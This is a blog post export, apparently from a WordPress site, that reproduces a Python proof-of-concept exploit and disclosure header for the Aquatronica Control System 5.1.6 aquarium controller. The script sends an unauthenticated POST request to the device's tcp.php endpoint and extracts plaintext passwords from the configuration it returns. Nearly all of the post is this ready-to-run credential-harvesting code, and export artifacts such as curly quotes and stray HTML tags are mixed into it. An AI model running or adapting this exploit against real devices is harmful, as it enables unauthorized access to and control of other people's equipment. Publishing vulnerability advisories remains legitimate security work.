#!\/usr\/bin\/env python
# -*- coding: utf-8 -*-
#
#
# Aquatronica Control System 5.1.6 Passwords Leak Vulnerability
#
#
# Vendor: Aquatronica s.r.l.
# Product web page: https:\/\/www.aquatronica.com
# Affected version: Firmware: 5.1.6
# Web: 2.0
#
# Summary: Aquatronica’s electronic AQUARIUM CONTROLLER is easy
# to use, allowing you to control all the electrical devices in
# an aquarium and to monitor all their parameters; it can be used
# for soft water aquariums, salt water aquariums or both simultaneously.
#
# Desc: The tcp.php endpoint on the Aquatronica controller is exposed
# to unauthenticated attackers over the network. This vulnerability
# allows remote attackers to send a POST request which can reveal
# sensitive configuration information, including plaintext passwords.
# This can lead to unauthorized access and control over the aquarium
# controller, compromising its security and potentially allowing attackers
# to manipulate its settings.
#
# Tested on: Apache\/2.0.54 (Unix)
# PHP\/5.4.17
#
#
# Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2024-5824
# Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2024-5824.php
#
#
# 04.05.2024
#<\/p>\n
import requests, html, re, sys, time
from urllib.parse import unquote<\/p>\n
program = “TCP”
command = “ws_get_network_cfg”
function_id = “TCP_XML_REQUEST”<\/p>\n
print(“””
_________ . .
(.. \\_ , |\\ \/|
\\ O \\ \/| \\ \\\/ \/
\\______ \\\/ | \\ \/
vvvv\\ \\ | \/ |
\\^^^^ == \\_\/ |
`\\_ === \\. |
\/ \/\\_ \\ \/ |
|\/ \\_ \\| \/
___ ______________\\________\/________aquatronica_0day___
| |
| |
| |
“””)<\/p>\n
if len(sys.argv) != 2:
print(“Usage: python aqua.py <ip:port>”)
sys.exit(1)<\/p>\n
ip = sys.argv[1]
url = f”http:\/\/{ip}\/{program.lower()}.php”<\/p>\n
post_data = {‘function_id’ : function_id.lower(),
‘command’ : command.upper()}<\/p>\n
r = requests.post(url, data=post_data)<\/p>\n
if r.status_code == 200:
r_d = unquote(r.text)
f_d_r = html.unescape(r_d)
regex = r’pwd=”([^”]+)”‘
rain = re.findall(regex, f_d_r)<\/p>\n
for drops in rain:
print(‘ ‘,drops)
time.sleep(0.5)
else:
print(f”Dry season! {r.status_code}”)<\/p>\n","protected":false},"excerpt":{"rendered":"
#!\/usr\/bin\/env python# -*- coding: utf-8 -*-### Aquatronica Control System 5.1.6 Passwords Leak Vulnerability### Vendor: Aquatronica s.r.l.# Product web page: https:\/\/www.aquatronica.com# Affected version: Firmware: 5.1.6# Web: 2.0## Summary: Aquatronica’s electronic AQUARIUM CONTROLLER is easy# to use, allowing you to control all the electrical devices in# an aquarium and to monitor all their parameters; it can be …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57152","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57152","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57152"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57152\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57152"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57152"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57152"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}